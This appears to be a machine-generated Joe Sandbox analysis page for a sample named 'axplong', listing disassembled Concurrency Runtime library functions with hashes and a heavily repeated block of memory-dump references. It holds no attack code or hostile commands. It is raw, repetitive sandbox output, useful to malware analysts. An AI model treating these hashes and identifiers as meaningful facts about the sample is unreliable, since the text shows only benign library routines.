                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2530155754-0
                                                                                                                                                                                                                                                    • Opcode ID: 0b4a4f2aa80b237c56689629b1f8911560a7d4c095f92d74bea887325f9aff93
                                                                                                                                                                                                                                                    • Instruction ID: 015c46ee05a9976ccf76161397ec0cf56ecb30920af316f6677c18cd7b520057
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b4a4f2aa80b237c56689629b1f8911560a7d4c095f92d74bea887325f9aff93
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3981587094024AABDF16AF58C961BFE7BB3AF57304F040098EC516B252C7368D6ADF61
                                                                                                                                                                                                                                                    Function 006A289D Relevance: 16.7, APIs: 11, Instructions: 222COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 006A28AF
                                                                                                                                                                                                                                                      • Part of subcall function 006A240E: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 006A2431
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 006A28D0
                                                                                                                                                                                                                                                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 006A28DD
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 006A292B
                                                                                                                                                                                                                                                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 006A29D3
                                                                                                                                                                                                                                                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 006A2A05
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1256429809-0
                                                                                                                                                                                                                                                    • Opcode ID: 55cabea71dc965b7c4b228bd92c25f1b2b9cd6272a6ff108f81a496b9906d8f2
                                                                                                                                                                                                                                                    • Instruction ID: 58fded36b1ff5c60fcdbd3e97a3e19a9288fafdaef61b372c9ccf0df2b2529e3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55cabea71dc965b7c4b228bd92c25f1b2b9cd6272a6ff108f81a496b9906d8f2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A71873094024AABDF15EF58C9A0AFEBBB7AF46304F044098ED41AB352C7369D16DF61
                                                                                                                                                                                                                                                    Function 00692762 Relevance: 15.2, APIs: 10, Instructions: 223COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 006927A6
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 0069280F
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00692843
                                                                                                                                                                                                                                                      • Part of subcall function 0069071D: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 0069073D
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 006928C3
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 0069290B
                                                                                                                                                                                                                                                      • Part of subcall function 006906F2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 0069070E
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 0069291F
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00692930
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 0069297D
                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 006929AE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1321587334-0
                                                                                                                                                                                                                                                    • Opcode ID: aa0007540e1ce80e01e71cf0a04f9f42b5ead9f2a8f7cf0f44f608e2ec886d12
                                                                                                                                                                                                                                                    • Instruction ID: 8233c9cefb7202a97f3d18070a3ad7a5d3472cc950284463487afa17db2c9626
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa0007540e1ce80e01e71cf0a04f9f42b5ead9f2a8f7cf0f44f608e2ec886d12
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B581A031E01527AFCF08DFA9D9A05ADB7BBBB48310B68412EE456E7F50D730A945CB84
                                                                                                                                                                                                                                                    Function 0069690A Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0069694F
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00696981
                                                                                                                                                                                                                                                    • List.LIBCONCRT ref: 006969BC
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 006969CD
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 006969E9
                                                                                                                                                                                                                                                    • List.LIBCONCRT ref: 00696A24
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00696A35
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00696A50
                                                                                                                                                                                                                                                    • List.LIBCONCRT ref: 00696A8B
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00696A98
                                                                                                                                                                                                                                                      • Part of subcall function 00695E0F: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00695E27
                                                                                                                                                                                                                                                      • Part of subcall function 00695E0F: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00695E39
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3403738998-0
                                                                                                                                                                                                                                                    • Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                                                                                                                                    • Instruction ID: 0a15cb08313fed76e5dadb3a928ea25427b3b508d45e4a3b7e4357265270d4da
